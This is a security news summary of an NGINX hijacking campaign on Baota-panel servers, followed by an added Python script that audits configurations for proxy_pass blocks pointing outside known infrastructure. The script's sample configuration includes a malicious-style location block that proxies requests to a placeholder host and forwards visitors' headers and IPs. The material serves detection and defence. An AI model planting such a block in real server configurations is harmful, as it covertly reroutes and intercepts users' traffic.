A malicious campaign is currently targeting NGINX servers by injecting unauthorized configuration blocks to hijack and reroute legitimate user traffic. By leveraging standard management directives, attackers are able to funnel specific requests through their own infrastructure without triggering traditional security alerts.
Security researchers have identified a specialized attack pattern targeting NGINX, a widely used open-source tool for web serving and traffic management. The campaign specifically focuses on installations associated with Baota hosting panels, frequently appearing on websites with Asian top-level domains or those belonging to government and educational institutions. Because NGINX is designed to act as an intermediary for load balancing and proxying, it provides a high-leverage point for attackers to intercept data before it reaches its intended destination.
The technical execution of this threat involves the silent modification of existing NGINX configuration files. Threat actors insert malicious location blocks that are programmed to capture incoming web requests on specific URL paths chosen by the attacker. This method allows the compromise to remain hidden within the standard operational logic of the server, making it difficult for administrators to notice changes during routine maintenance.
Once a request is captured, the modified server rewrites the traffic to include the full original URL and forwards it to an external domain under the attacker's control. This is achieved through the abuse of the proxy_pass directive, a legitimate feature typically used to distribute traffic across multiple backend servers to ensure high performance. Because the directive is a fundamental part of NGINX's intended functionality, its use for malicious redirection does not usually flag any security warnings.
To maintain the illusion of legitimacy, the hijacked traffic retains its original metadata. Crucial request headers, including the host identity, user agent strings, and the real IP address of the visitor, are preserved as the data moves through the attacker's backend. This ensures that the redirected traffic looks identical to standard web requests, preventing simple filtering tools from identifying the rerouting as an anomaly.
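The following audit script is an added example written for this summary; it is not code from the article or from NGINX. It parses a configuration file into nested blocks, collects the names of declared upstreams, and flags any location block whose proxy_pass target is neither a declared upstream, a loopback or private address, nor an operator-supplied allowlisted host, reporting which request headers that block forwards. The sample configuration, the hostname relay.example.invalid, and the allowed_hosts parameter are constructed for illustration.

```python
"""Audit an NGINX configuration for location blocks that proxy traffic to
hosts outside the server's own infrastructure (added example, not from
the article)."""
import ipaddress
import re

# Constructed sample configuration. The /download/ block models the pattern
# described above: proxy_pass to an external host, forwarding the original
# Host, User-Agent and client IP. The host name is a placeholder.
SAMPLE_CONF = """
upstream app_backend {
    server 127.0.0.1:8080;
}

server {
    listen 80;
    server_name example.test;

    location / {
        proxy_pass http://app_backend;
        proxy_set_header Host $host;
    }

    location /download/ {
        proxy_pass http://relay.example.invalid$request_uri;
        proxy_set_header Host $host;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header X-Real-IP $remote_addr;
    }
}
"""

# Tokens: quoted strings, block/statement delimiters, or bare words.
TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|[{};]|[^\s{};]+')
# Host portion of a proxy_pass target; stops at port, path or NGINX variable.
HOST_RE = re.compile(r'^(?:https?://)?(?:\[([^\]]+)\]|([^/:$?#]+))')


def _strip_comments(text):
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())


def parse_nginx(text):
    """Return a list of (name, args, children) tuples; children is None for a
    simple directive and a list for a block such as server or location."""
    tokens = TOKEN_RE.findall(_strip_comments(text))
    pos = 0

    def parse_block():
        nonlocal pos
        items = []
        while pos < len(tokens):
            if tokens[pos] == "}":
                pos += 1
                return items
            words = []
            while pos < len(tokens) and tokens[pos] not in (";", "{", "}"):
                words.append(tokens[pos])
                pos += 1
            if pos >= len(tokens) or not words:
                pos += 1
                continue
            if tokens[pos] == "{":
                pos += 1
                items.append((words[0], words[1:], parse_block()))
            elif tokens[pos] == ";":
                pos += 1
                items.append((words[0], words[1:], None))
        return items

    return parse_block()


def _walk(items):
    for name, args, children in items:
        yield name, args, children
        if children is not None:
            yield from _walk(children)


def declared_upstreams(tree):
    return {args[0] for name, args, _ in _walk(tree) if name == "upstream" and args}


def _is_internal_host(host):
    if host in ("localhost", "unix"):
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_private


def audit_proxy_targets(conf_text, allowed_hosts=()):
    """Return one finding per location whose proxy_pass leaves known
    infrastructure, with the headers that block forwards to the target."""
    tree = parse_nginx(conf_text)
    allowed = set(allowed_hosts) | declared_upstreams(tree)
    findings = []
    for name, args, children in _walk(tree):
        if name != "location" or children is None:
            continue
        for dname, dargs, _ in children:
            if dname != "proxy_pass" or not dargs:
                continue
            m = HOST_RE.match(dargs[0])
            host = (m.group(1) or m.group(2)) if m else dargs[0]
            if host in allowed or _is_internal_host(host):
                continue
            headers = [d[1][0] for d in children if d[0] == "proxy_set_header" and d[1]]
            findings.append({"location": " ".join(args), "target": dargs[0],
                             "host": host, "forwarded_headers": headers})
    return findings


if __name__ == "__main__":
    for f in audit_proxy_targets(SAMPLE_CONF):
        print(f"location {f['location']} proxies to {f['host']} "
              f"forwarding {', '.join(f['forwarded_headers'])}")
```

Run it against the real files under the NGINX include path (including any panel-managed vhost directories) and pair it with file-integrity monitoring on those files, since the article's point is that the directive itself is legitimate and only the destination and the unexplained change are suspicious.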
This stealthy approach allows the threat actors to monitor or manipulate user interactions while remaining embedded in the victim's infrastructure. By mimicking the way modern web architecture handles load balancing, the campaign turns a standard performance tool into a conduit for data interception. The discovery highlights a growing trend of attackers utilizing native software features to bypass traditional detection mechanisms in high-value networking environments.
Source: Hackers Compromise Nginx Servers To Redirect Legitimate User Traffic